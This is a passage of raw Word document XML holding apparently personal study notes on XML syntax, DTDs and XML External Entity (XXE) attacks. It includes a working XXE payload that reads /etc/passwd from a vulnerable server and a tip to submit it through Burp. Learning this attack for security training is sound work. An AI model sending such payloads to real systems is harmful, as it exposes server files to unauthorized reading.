      <w:r w:rsidRPr="0084205E">
        <w:t>eXtensible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Markup Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B766466" w14:textId="751EE918" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What is XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1372E" w14:textId="7AD5D857" w:rsidR="00950A34" w:rsidRPr="0084205E" w:rsidRDefault="00950A34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Markup language that defines a set of rules for encoding documents in format both human and machine readable</w:t>
      </w:r>
      <w:r w:rsidR="000844B0" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for storing/transporting data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D9827B" w14:textId="6026C6E9" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Why is XML used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA9D52D" w14:textId="0DCCC686" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Platform-independent, language-independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8ACCB" w14:textId="75AD175D" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data stored/transported using XML can be changed at any point in time without affect presentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C663436" w14:textId="57E21D29" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows validation using DTD and Schema – free from syntax error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18859227" w14:textId="19B9CCA1" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Simplifies data sharing between various systems – no conversion required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EBF836" w14:textId="1264ED21" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E9BE64" w14:textId="48419DBA" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XML prolog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184CBBBE" w14:textId="4FB2003E" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;?xml version=”1.0” encoding</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=”UTF</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-8”?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC02017" w14:textId="66FB4848" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Above the line is called XML prolog and specifies XML version and encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110DC67" w14:textId="32C80488" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Must contain root element – XML document will be invalid without</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E629DCA" w14:textId="123EA3C9" w:rsidR="000844B0" w:rsidRPr="0084205E" w:rsidRDefault="000844B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can use attributes as in HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E1005" w14:textId="50746AAD" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XML External Entity – DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D97BBC" w14:textId="4558A5FC" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Document Type Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E49DD1" w14:textId="00C7FC55" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Defines structure and legal elements/attributes of XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132802BA" w14:textId="66F27B45" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – defines root element of the document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FE48C" w14:textId="6A3E5B43" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>!ELEMENT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;insert&gt; – defines the note element must contain the elements “to, from, heading, body”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA88F2" w14:textId="4DDE4FDD" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To – defines to element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AAABB9" w14:textId="7557BC71" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>From – defines the from element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E5297F" w14:textId="338F02A4" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Heading – defines the heading element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106510CB" w14:textId="65FD59D5" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Body – defines the body element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436C3737" w14:textId="1406D3E2" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>!ENTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – defines new entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9E576" w14:textId="64FB4F94" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">#PCDATA – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>parseable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> character data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828CFBD" w14:textId="2FAE9750" w:rsidR="00C319E8" w:rsidRPr="0084205E" w:rsidRDefault="00C319E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XML External Entity – XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFA9CF" w14:textId="55840C8E" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="008D7E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Define ENTITY called name and assign a value to use in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2940E" w14:textId="000F2D0D" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="008D7E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use XXE to read system file by defining ENTITY and using SYSTEM keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140051E" w14:textId="301E05AA" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="008D7E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Define an ENTITY named read with value set to SYSTEM and path of file (such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A1348" w14:textId="41851609" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="008D7E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>A website vulnerable to XXE would display content of file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB33CF" w14:textId="70694256" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EX code – changes name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED251A2" w14:textId="77777777" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;!DOCTYPE replace [&lt;!ENTITY name "feast"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592A7EA" w14:textId="77777777" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>userInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640A3C9" w14:textId="77777777" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>firstName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;falcon&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>firstName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D81F73" w14:textId="77777777" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lastName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;&amp;name;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lastName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAB076" w14:textId="3DCEF68E" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>userInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D56E7E" w14:textId="5A17CB42" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EX code – displays /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="004C1140" w:rsidRPr="0084205E">
        <w:t>passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E90CF7" w14:textId="77777777" w:rsidR="004C1140" w:rsidRPr="0084205E" w:rsidRDefault="004C1140" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA34CD4" w14:textId="77777777" w:rsidR="004C1140" w:rsidRPr="0084205E" w:rsidRDefault="004C1140" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;!DOCTYPE root [&lt;!ENTITY read SYSTEM 'file:///etc/passwd'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD7ED6" w14:textId="32C7267A" w:rsidR="004C1140" w:rsidRPr="0084205E" w:rsidRDefault="004C1140" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;root&gt;&amp;read;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13AA83" w14:textId="2842D676" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="008D7E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXM External Entity – Exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42248EC6" w14:textId="24532B98" w:rsidR="008D7E89" w:rsidRPr="0084205E" w:rsidRDefault="00C31E89" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pair with Burp when submitting XXE attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC3D36" w14:textId="3917240E" w:rsidR="00C31E89" w:rsidRPr="0084205E" w:rsidRDefault="007703A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
